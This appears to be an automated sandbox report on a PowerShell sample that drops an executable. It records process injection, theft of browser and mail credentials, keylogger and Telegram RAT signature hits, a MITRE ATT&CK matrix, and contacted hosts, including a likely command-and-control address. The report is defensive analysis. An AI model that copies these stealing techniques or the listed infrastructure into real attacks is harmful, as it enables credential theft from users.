                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\believe.ps1 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Snake Keylogger
                      Source: Yara matchFile source: 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR
                      Yara detected VIP Keylogger
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 4.2.x.exe.328c714.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.3287ec1.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.3287ec1.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.328c714.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1321698645.0000000003287000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Snake Keylogger
                      Source: Yara matchFile source: 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR
                      Yara detected VIP Keylogger
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      PowerShell                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		11
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		31
                      Virtualization/Sandbox Evasion                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
                      Process Injection                      		Security Account Manager31
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		13
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                      Obfuscated Files or Information                      		LSA Secrets1
                      System Network Configuration Discovery                      		SSHKeylogging24
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Software Packing                      		Cached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Timestomp                      		DCSync13
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638285 Sample: believe.ps1 Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 29 reallyfreegeoip.org 2->29 31 api.telegram.org 2->31 33 2 other IPs or domains 2->33 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 59 9 other signatures 2->59 8 powershell.exe 16 2->8         started        12 notepad.exe 5 2->12         started        signatures3 55 Tries to detect the country of the analysis system (by using the IP) 29->55 57 Uses the Telegram API (likely for C&C communication) 31->57 process4 file5 25 C:\Users\user\AppData\Local\Temp\x.exe, PE32 8->25 dropped 65 Found suspicious powershell code related to unpacking or dynamic code loading 8->65 67 Powershell drops PE file 8->67 14 x.exe 15 3 8->14         started        19 conhost.exe 8->19         started        signatures6 process7 dnsIp8 41 176.65.144.3, 49689, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 14->41 27 C:\Users\user\AppData\Local\Temp\RUNPEE.dll, PE32 14->27 dropped 43 Antivirus detection for dropped file 14->43 45 Multi AV Scanner detection for dropped file 14->45 47 Injects a PE file into a foreign processes 14->47 21 x.exe 2 14->21         started        file9 signatures10 process11 dnsIp12 35 api.telegram.org 149.154.167.220, 443, 62172 TELEGRAMRU United Kingdom 21->35 37 checkip.dyndns.com 158.101.44.242, 49690, 49693, 49697 ORACLE-BMC-31898US United States 21->37 39 reallyfreegeoip.org 104.21.64.1, 443, 49691, 49692 CLOUDFLARENETUS United States 21->39 61 Tries to steal Mail credentials (via file / registry access) 21->61 63 Tries to harvest and steal browser information (history, passwords, etc) 21->63 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.